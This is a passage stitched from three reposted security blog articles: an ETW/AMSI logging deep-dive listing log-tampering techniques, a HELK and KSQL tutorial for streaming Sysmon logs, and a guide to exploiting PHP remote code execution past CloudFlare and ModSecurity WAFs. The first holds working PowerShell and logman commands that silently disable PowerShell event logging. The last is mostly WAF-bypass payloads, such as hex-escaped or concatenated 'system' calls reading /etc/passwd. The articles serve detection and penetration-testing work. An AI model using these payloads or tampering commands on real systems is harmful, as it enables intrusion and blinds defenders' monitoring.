MatchAnyKeyword : 0x8000000000000000
MatchAllKeyword : 0x0
EnableProperty : {EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0, EVENT_ENABLE_PROPERTY_SID}

The following properties should be noted:

  • Operational channel events (as indicated by 
    0x8000000000000000
     in the MatchAnyKeyword value) are captured.
  • All logging levels are captured.
  • Events should be captured even if an event keyword value is zero as indicated by the 
    EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0
     flag.

This information on its own does not explain why AMSI events are not logged, but it supplies needed context upon inspecting how 

amsi.dll
 writes events to ETW. By loading 
amsi.dl
 into IDA, we can see that there was a single call to the 
EventWrite
 function within the internal 
CAmsiAntimalware::GenerateEtwEvent
 function:

The relevant portion of the call to 

EventWrite
 is the 
EventDescriptor
argument. Upon applying the 
EVENT_DESCRIPTOR
 structure type to 
_AMSI_SCANBUFFER
, the following information was interpreted:

The 

EVENT_DESCRIPTOR
 context gives us the relevant information:

  • Event ID: 
    1101 (0x44D)<br>
    This events details can be extracted from a recovered manifest as seen here.
  • Channel: 
    16 (0x10)
     referring to the operational event log channel
  • Level: 4 (Informational)
  • Keyword: 
    0x8000000000000001
     (AMSI/Operational OR Event1). These values are interpreted by running the 
    logman query providers Microsoft-Antimalware-Scan-Interface
     command.

We now understand that 1101 events not logged to the Application event log because it only considers events where the keyword value matches 0x8000000000000000. In order to fix this issue and get events pumping into the event log, either the Application event log trace session would need to be modified (not recommended and requires SYSTEM privileges) or you could create your own persistent trace session (e.g., an autologger) to capture AMSI events in the event log. The following PowerShell script creates such a trace session:

$AutoLoggerGuid = "{$((New-Guid).Guid)}"
New-AutologgerConfig -Name MyCustomAutoLogger -Guid $AutoLoggerGuid -Start Enabled
Add-EtwTraceProvider -AutologgerName MyCustomAutoLogger -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41

After running the above command, reboot, and the AMSI event log will begin to populate.

Some additional reverse engineering showed that the 

scanResult
 field refers to the AMSI_RESULT enum where, in this case, 32768 maps to 
AMSI_RESULT_DETECTED
, indicating that the buffer (the Unicode encoded buffer in the content field) was determined to be malicious.

Without knowledge of ETW internals, a defender would not have been able to determine that additional data sources (the AMSI log in this case) can be fed into the event log. One would have to resort to speculation as to how the AMSI event became to be misconfigured and whether or not the misconfiguration was intentional.

ETW tampering techniques

If the goal of an attacker is to subvert event logging, ETW provides a stealthy mechanism to affect logging without itself generating an event log trail. Below is a non-exhaustive list of tampering techniques that an attacker can use to cut off the supply of events to a specific event log.

Tampering techniques can generally be broken down into two categories:

  1. Persistent, requiring reboot — i.e., a reboot must occur before the attack takes effect. Changes can be reverted, but would require another reboot. These attacks involve altering autologger settings — persistent ETW trace sessions with settings in the registry. There are more types of persistent attacks than ephemeral attacks, and they are usually more straightforward to detect.
  2. Ephemeral — i.e., where the attack can take place without a reboot.

Autologger provider removal

Tampering category: Persistent, requiring reboot
Minimum permissions required: Administrator
Detection artifacts: Registry key deletion: 

HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}


Description: This technique involves the removal of a provider entry from a configured autologger. Removing a provider registration from an autologger will cause events to cease to flow to the respective trace session.
 
Example: The following PowerShell code disables Microsoft-Windows-PowerShell event logging:

Remove-EtwTraceProvider -AutologgerName EventLog-Application -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'

In the above example, 

A0C1853B-5C40-4B15-8766-3CF1C58F985A
 refers to the Microsoft-Windows-PowerShell ETW provider. This command will end up deleting the 
HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\{a0c1853b-5c40-4b15-8766-3cf1c58f985a}
 registry key.

Provider “Enable” property modification

Tampering category: Persistent, requiring reboot
Minimum permissions required: Administrator
Detection artifacts: Registry value modification: 

HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID} - EnableProperty (REG_DWORD)


Description: This technique involves alerting the 
Enable
 keyword of an autologger session. For example, by default, all ETW provider entries in the 
EventLog-Application
 autologger session are set to 
0x41
 which translates to 
EVENT_ENABLE_PROPERTY_SID
 and 
EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0
EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0
 is not documented; it specifies that any events generated for a provider should be logged even if the keyword value is set to 0. An attacker could swap out 
EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0
 for 
EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0
, resulting in a value of 
0x11
, which would result in all events where the keyword is 0 to not be logged. For example, PowerShell eventing supplies a 0 keyword value with its events, resulting in no logging to the PowerShell event log.

Example: The following PowerShell code disables Microsoft-Windows-PowerShell event logging:

Set-EtwTraceProvider -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}' -AutologgerName 'EventLog-Application' -Property 0x11

In the above example, 

A0C1853B-5C40-4B15-8766-3CF1C58F985A
 refers to the Microsoft-Windows-PowerShell ETW provider. This command will end up setting 
HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\EnableProperty
 to 
0x11
. Upon rebooting, events will cease to be reported to the PowerShell event log.
 
An attacker is not constrained to using just the Set-EtwTraceProvider cmdlet to carry out this attack. An attacker could just modify the value directly in the registry. 
Set-EtwTraceProvider
 offers a convenient autologger configuration abstraction.

Alternative detection artifacts/ideas: If possible, it is advisable to monitor for modifications of values within the 
HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}
 registry key. Note that modifying 
EnableProperty
 is just one specific example and that an attacker can alter ETW providers in other ways, too.

ETW provider removal from a trace session

Tampering category: Ephemeral
Minimum permissions required: SYSTEM
Detection artifacts: Unfortunately, no file, registry, or event log artifacts are associated with this event. While the technique example below indicates that 

logman.exe
 was used to perform the attack, an attacker can obfuscate their techniques by using Win32 APIs directly, WMI, DCOM, PowerShell, etc.
 
Description: This technique involves removing an ETW provider from a trace session, cutting off its ability to supply a targeted event log with events until a reboot occurs, or until the attacker restores the provider. While an attacker must have SYSTEM privileges to perform this attack, it is unlikely that defenders will notice such an attack if they rely on event logs for threat detection.
 
Example: The following PowerShell code immediately disables Microsoft-Windows-PowerShell event logging until a reboot occurs or the attacker restores the ETW provider:


logman update trace EventLog-Application --p Microsoft-Windows-PowerShell -ets

Alternative detection artifacts/ideas:

  • Event ID 12 within the Microsoft-Windows-Kernel-EventTracing/Analytic log indicates when a trace session is modified, but it doesn’t supply the provider name or GUID that was removed, so it would be difficult to confidently determine whether or not something suspicious occurred using this event.
  • There have been several references thus far to the ETW PowerShell cmdlets housed in the 
    EventTracingManagement
     module, which itself is a CDXML-based module. This means that all the cmdlets in the 
    EventTracingManagement
     are backed by WMI classes. For example, the 
    Get-EtwTraceProvider
     cmdlet is backed by the 
    ROOT/Microsoft/Windows/EventTracingManagement:MSFT_EtwTraceProvider
    class. Considering ETW providers can be represented in the form of WMI class instances, you could craft a permanent WMI event subscription that logs all provider removals from a specific trace session to the event log. This code sample creates an 
    NtEventLogEventConsumer
     instance that logs event ID 8 to the Application event log (source: WSH) any time a provider is removed from the Application event log trace session, 
    EventLog-Application
    . The logged event looks like the following:
  • The frequency at which providers are removed from Application event logs in large environments is not currently known. As as fallback, it is still advised to log the execution of 
    logman.exe
    wpr.exe
    , and PowerShell in your environment.

Conclusion

Identifying blind spots and assumptions in Alerting and Detection Strategies is a crucial step in ensuring the resilience of detections. Since ETW is at the core of the event logging infrastructure, gaining an in-depth understanding of ETW tampering attacks is a valuable way to increase the integrity of security-related data sources.

Further Reading

Real-Time Sysmon Processing via KSQL and HELK — Part 1: Initial Integration

( Original text by Roberto Rodriguez )

During a recent talk titled “Hunters ATT&CKing with the Right Data” that I gave with my brother Jose Luis Rodriguez @Cyb3rPandaH at ATT&CKcon, we talked about the importance of documenting and modeling security event logs before developing any data analytics while preparing for a threat hunting engagement. Defining relationships among Windows security event logs such as Sysmon, for example, helped us to appreciate the extra context that two or more events together can provide for a hunt. Therefore, I was wondering if there was anything that I could do with my project HELK to apply some of the relationships presented in our talk, and enrich the data collected from my endpoints in real-time.

This post is part of a three-part series. In this first one, I will introduce the initial integration of a new application named KSQL to the HELK ecosystem in order to enable a SQL interface for stream processing on the top of the Kafka platform already provided by HELK. On the other two posts, I will go over a basic example of a JOINstatement with Sysmon Event ID 1 (Process Creation) and Sysmon Event ID 3 (Network Connection), and show you how useful it could be during a hunting engagement. The other two parts can be found in the following links:

What is KSQL?

KSQL is the open source streaming SQL engine for Apache Kafka®. It provides an easy-to-use yet powerful interactive SQL interface for stream processing on Kafka, without the need to write code in a programming language such as Java or Python. KSQL is scalable, elastic, fault-tolerant, and real-time. It supports a wide range of streaming operations, including data filtering, transformations, aggregations, joins, windowing, and sessionization.

KSQL is implemented on the top of the Kafka Streams API which means that KSQL queries are compiled via Kafka Streams applications.

What is “Kafka Streams”?

Kafka Streams is a JVM client library to develop stream processing applications that leverage data stored in Kafka clusters. Remember that stream processing applications do not run inside of Kafka nodes. Instead, Kafka Streams applications read from topics available in Kafka nodes, process the data on their own internal stream processors, and write the results back to the same or new topic in the Kafka cluster.

This concept is what makes KSQL flexible and easy to use with current Kafka cluster deployments.

What is a Stream?

stream is the most important abstraction provided by Kafka Streams: it represents an unbounded, continuously updating data set, where unbounded means “of unknown or of unlimited size”

Think of a stream as a sequence of data records ordered by time in a key-value format that can be queried for further analysis. One example could be messages from a Kafka topic that stores information about process creationsof specific endpoints in your network as shown below.

KSQL: SQL interface for stream processing?

Essentially, KSQL allows you to easily execute SQL-like queries on the top of streams flowing from Kafka topics. KSQL queries get translated to Java code via the Kafka Streams API reducing the complexity of writing several lines of Java code for real-time streaming processing. Our basic design then would look like the following:

KSQL and SQL JOIN?

Now that we have gained some understanding of KSQL, let’s define one of the SQL capabilities provided by KSQL that will be helpful for this post, a SQL JOINKSQL join operations merge streams and/or tables on common data key values producing new streams or tables in real-time.

Streams vs Tables

Once again, streams are never-ending sequence of data records ordered by time that represent the past and the present state of data ingested to a Kafka topic. One can access a stream from the beginning of its time all the way to the recent recorded values. Tables on the other hand, represent only the up to date state of data records. For example, if DHCP logs are being collected, you can have a table that keeps the most up to date mapping between an IP address and a domain computer in your environment. Meanwhile, you can query the DHCP logs stream and access past IP addresses assigned to workstations in your network.

According to the Confluent Developers Guide, you can join streams and tables in the following way:

INNER, LEFT OUTER & FULL OUTER JOINS?

Inner Join: It returns data records that have matching values in both sources

Left Outer Join: It returns data records from the left source and the matched data records from the right source

Full Outer Join: It returns data records when there is a match in either left or right source

I hope this small review of KSQL and the concepts around Kafka Streams were helpful to get you familiarized with the technology being added to the HELK.

Why KSQL and HELK?

As I mentioned at the beginning of this post, I wanted to find a way to enrich Windows Sysmon event logs by applying the relationships identified within the information it provides. From an infrastructure perspective, I already collect Sysmon event logs from my Windows endpoints and publish them directly to a Kafka topic named winlogbeat in HELK. Therefore, after what we just learned about KSQL, it will be very easy to use it with the current HELK Kafka deployment and apply a Sysmon data model via join operations in real-time.

What is a data model?

A data model in general determines the structure of data objects present in a data set and the relationships identified among each other. From a security events perspective, data objects can be entities provided in event logs such as a “User”, a “Host”,a “Process”, a “File” or even an “IP address”. As any other data object, they also have properties such as “user_name”, “host_name”, “process_name” or “file_name”, and depending on the information provided by each event log, relationships can be defined among those data objects as shown below:

Modeling data objects identified in security event logs help security analysts to identify the right data sources and correlations that can be used for the development of data analytics.

What is the “Sysmon Data Model”?

Windows Sysmon event logs provide information about several data objects such as “Processes”, “IP Addresses”, “Files”, “Registry Keys”, and even “Named Pipes”. In addition, most of their data objects have a common property named ProcessGUID that defines direct relationships among specific Sysmon events. According to my teammates Matt Graeber and Lee Christensen, in their recent white paper “Subverting Sysmon”, the ProcessGUID is a unique value derived from the machine GUID, process start time, and process token ID that can be used to correlate other related events. After documenting the relationships among Sysmon events and data objects based on their ProcessGUID property, the following data model is possible:

As we already know, KSQL join operations happen on common unique data key values. Therefore, the ProcessGUID property can be used to join Sysmon events. For the purpose of this post, we will join ProcessCreate (Event ID 1) and NetworkConnect (Event ID 3) events.

HELK and KSQL Integration

KSQL was developed as part of the Confluent platform, and it can be distributed via docker images available on DockerHub. HELK is deployed via docker images as a proof of concept, so having docker images for KSQL works perfectly. The two docker images that I added to the HELK ecosystem are the following ones:

  • Cp-ksql-server Image: It includes the ksql-server package which runs the engine that executes KSQL queries.
  • Cp-ksql-cli Image: It includes the ksql-cli package which acts as a client to the KSQL server which allows researchers to interactively pass KSQL queries to the KSQL server. This one is added to the HELK just for testing purposes. The KSQL server can run independently with predefined SQL queries files.

For this blog post, we will need the following:

  • An Ubuntu box hosting the latest HELK build
  • A Windows 10 System with Sysmon installed
  • Winlogbeat installed on the Windows 10 and shipping logs to HELK

Deploying KSQL via HELK

Clone the HELK to your Ubuntu box, and change your directory to docker as shown below:

git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/docker

Run the helk_install.sh script to install and run the HELK docker images. You can just go with all the default options and run the basic HELK deployment which comes with both KSQL server and KSQL CLI containers.

sudo ./helk_install.sh

If you want to monitor your HELK installation, you can open another console, and run the following commands:

tail -f /var/log/helk-install.log

Once the installation finishes, you should see the following on your main screen:

Run the following commands to see if your containers are running:

sudo docker ps

Launch KSQL CLI interface

You are now ready to start using KSQL. We will use KSQL via its command line interface (CLI) to connect to the helk-ksql-server container and send KSQL queries to it. Run the following command to access the helk-ksql-clicontainer and establish a connection to the helk-ksql-server container:

sudo docker exec -ti helk-ksql-cli ksql http://helk-ksql-server:8088

A KSQL CLI banner will show up, and you will be able to use the KSQL CLI

Inspect the KSQL Server Properties

You can now start by checking the properties assigned to the KSQL server by running the following commands:

ksql> SHOW PROPERTIES;

The information above confirms that the helk-kafka-broker is part of the ksql.streams.bootstrap.servers. Therefore, we will able to execute KSQL queries on the topics available in the Kafka broker.

Check Available Kafka Topics

We can check the metadata of topics available on ur helk-kafka-broker with the SHOW TOPICS command.

ksql> SHOW TOPICS;

What the HELK is going on so far?

Up to this point, we have all we need to start using KSQL on the top of the HELK project. The following is happening:

  • HELK’s Kafka broker with topic winlogbeat running
  • KSQL Server is running and configured to read from the Kafka topic named winlogbeat
  • KSQL CLI is running and configured to talk to KSQL Server and send interactive queries
  • Your Ubuntu box hosting the HELK has an interactive connection to the helk-ksql-cli container
  • HELK is waiting for Windows Sysmon logs to be published

Get Sysmon Data to HELK

You can now install Sysmon and Winlogbeat following the initial instructions in this post. The following binary versions and configurations are recommended:

Sysmon V8.04

Winlogbeat V6.5.3

Remember to start the winlogbeat service to start sending logs to the HELK Kafka broker as shown in the image below:

Check Winlogbeat Shipping Logs

You can check if the logs being collected by the Winlogbeat Shipper are being published to your HELK Kafka broker by running the following command on your Windows endpoint:

winlogbeat.exe -e

Check Logs Published to Kafka Topics

You can also inspect messages making it to the Kafka topic winlogbeat with the PRINT command as shown below:

ksql> PRINT ‘winlogbeat’;

We can confirm that data is flowing from our Windows system to our HELK Kafka broker, and through our KSQL Server.


I hope this first post helped you to get familiarized with the basic concepts of KSQL, and showed you how easy it is to use it with the latest version of HELK. In the next post, I will show you how to use KSQL in order to start joining Sysmon events 1 and 3 in real-time. The Sysmon-Join KSQL Recipe will be shared for you to try it.

References

https://docs.confluent.io/current/ksql/docs/developer-guide/join-streams-and-tables.html#join-streams-and-tables-with-ksql
https://www.confluent.io/blog/introducing-kafka-streams-stream-processing-made-simple/
https://docs.confluent.io/current/ksql/docs/index.html
https://hub.docker.com/u/confluentinc
https://docs.confluent.io/current/ksql/docs/index.html#what-are-the-components
https://docs.confluent.io/current/installation/docker/docs/image-reference.html
https://docs.confluent.io/current/ksql/docs/developer-guide/syntax-reference.html#ksql-syntax-reference

How To Exploit PHP Remotely To Bypass Filters & WAF Rules

( Original text by Andrea Menin )

In the last three articles, I’ve been focused on how to bypass WAF rule set in order to exploit a remote command execution. In this article, I’ll show you how many possibilities PHP gives us in order to exploit a remote code execution bypassing filters, input sanitization, and WAF rules. Usually when I write articles like this one people always ask “really people write code like this?” and typically they’re not pentesters. Let me answer before you ask me again : YES and YES.

This is the first of two vulnerable PHP scripts that I’m going to use for all tests. This script is definitely too easy and dumb but it’s just to reproducing a remote code execution vulnerability scenario (probably in a real scenario, you’ll do a little bit more work to reach this situation):

first PHP script

Obviously, the sixth line is pure evil. The third line tries to intercept functions like 

system
exec
 or 
passthru
 (there’re many other functions in PHP that can execute system commands but let’s focus on these three). This script is running in a web server behind the CloudFlare WAF (as always, I’m using CloudFlare because it’s easy and widely known by the people, this doesn’t mean that CloudFlare WAF is not secure. All other WAF have the same issues, more or less…). The second script will be behind ModSecurity + OWASP CRS3.

Trying to read /etc/passwd

For the first test, I try to read /etc/passwd using 

system()
 function by the request 
/cfwaf.php?code=system(“cat /etc/passwd”);

CloudFlare WAF blocks my first try

As you can see, CloudFlare blocks my request (maybe because the “/etc/passwd”) but, if you have read my last article about uninitialized variable, I can easily bypass with something like 

cat /etc$u/passwd

CloudFlare WAF bypassed but input sanitization blocks the request

CloudFlare WAF has been bypassed but the check on the user’s input blocked my request because I’m trying to use the “system” function. Is there a syntax that let me use the 

system
 function without using the “system” string? Let’s take a look at the PHP documentation about strings!

PHP String escape sequences

\[0–7]{1,3}
 sequence of characters in octal notation, which silently overflows to fit in a byte (e.g. “\400” === “\000”)

\x[0–9A-Fa-f]{1,2}
 sequence of characters in hexadecimal notation (e.g. “\x41″)

\u{[0–9A-Fa-f]+}
 sequence of Unicode codepoint, which will be output to the string as that codepoint’s UTF-8 representation (added in PHP 7.0.0)

Not everyone knows that PHP has a lot of syntaxes for representing a string, and with the “PHP Variable functions” it becomes our Swiss Army knife for bypassing filters and rules.

PHP Variable functions

PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.

this means that syntaxes like 

$var(args);
 and 
“string”(args);
 are equal to 
function(args);
. If I can call a function by using a variable or a string, it means that I can use an escape sequence instead of the name of a function. Here an example:

the third syntax is an escape sequence of characters in a hexadecimal notation that PHP converts to the string “system” and then it converts to the function system with the argument “ls”. Let’s try with our vulnerable script:

user input sanitization bypassed

This technique doesn’t work for all PHP functions, variable functions won’t work with language constructs such as echoprintunset()isset()empty()includerequire and the like. Utilize wrapper functions to make use of any of these constructs as variable functions.

Improve the user input sanitization

What happens if I exclude characters like double and single quotes from the user input on the vulnerable script? Is it possible to bypass it even without using double quotes? Let’s try:

prevent using “ and ‘ on $_GET[code]

as you can see on the third line, now the script prevents the use of 

 and 
 inside the 
$_GET[code]
 querystring parameter. My previous payload should be blocked now:

Now my vulnerable script prevents using “

Luckily, in PHP, we don’t always need quotes to represent a string. PHP makes you able to declare the type of an element, something like 

$a = (string)foo;
 in this case, 
$a
 contains the string “foo”. Moreover, whatever inside round brackets without a specific type declaration, is treated as a string:

In this case, we’ve two ways to bypass the new filter: the first one is to use something like 

(system)(ls);
 but we can’t use “system” inside the code parameter, so we can concatenate strings like 
(sy.(st).em)(ls);
. The second one is to use the 
$_GET
variable. If I send a request like 
?a=system&amp;b=ls&amp;code=$_GET[a]($_GET[b]);
 the result is: 
$_GET[a]
 will be replaced with the string “system” and 
$_GET[b]
 will be replaced with the string “ls” and I’ll able to bypass all filters!

Let’s try with the first payload 

(sy.(st).em)(whoami);

WAF bypassed, filter bypassed

and the second payload 

?a=system&amp;b=cat+/etc&amp;c=/passwd&amp;code=$_GET[a]($_GET[b].$_GET[c]);

WAF bypassed, filter bypassed

In this case is not useful, but you can even insert comments inside the function name and inside the arguments (this could be useful in order to bypass WAF Rule Set that blocks specific PHP function names). All following syntaxes are valid:

get_defined_functions

This PHP function returns a multidimensional array containing a list of all defined functions, both built-in (internal) and user-defined. The internal functions will be accessible via 

$arr[“internal”]
, and the user-defined ones using 
$arr[“user”]
. For example:

This could be another way to reach the system function without using its name. If I grep for “system” I can discover its index number and use it as a string for my code execution:

1077 = system

obviously, this should work against our CloudFlare WAF and script filters:

bypass using get_defined_functions

Array of characters

Each string in PHP can be used as an array of characters (almost like Python does) and you can refer to a single string character with the syntax 

$string[2]
 or 
$string[-3]
. This could be another way to elude rules that block PHP functions names. For example, with this string 
$a=”elmsty/ “;
 I can compose the syntax 
system(“ls /tmp”);

If you’re lucky you can find all the characters you need inside the script filename. With the same technique, you can pick all chars you need with something like 

(__FILE__)[2]
:

OWASP CRS3

Let me say that with the OWASP CRS3 all becomes harder. First, with the techniques seen before I can bypass only the first paranoia level, and this is amazing! Because the Paranoia Level 1 is just a little subset of rules of what we can find in the CRS3, and this level is designed for preventing any kind of false positive. With a Paranoia Level 2 all things becomes hard because of the rule 942430 “Restricted SQL Character Anomaly Detection (args): # of special characters exceeded”. What I can do is just execute a single command without arguments like “ls”, “whoami”, etc.. but I can’t execute something like system(“cat /etc/passwd”) as done with CloudFlare WAF:

Previous Episodes

Web Application Firewall Evasion Techniques #1
https://medium.com/secjuice/waf-evasion-techniques-718026d693d8

Web Application Firewall Evasion Techniques #2
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0

Web Application Firewall Evasion Techniques #3
https://www.secjuice.com/web-application-firewall-waf-evasion/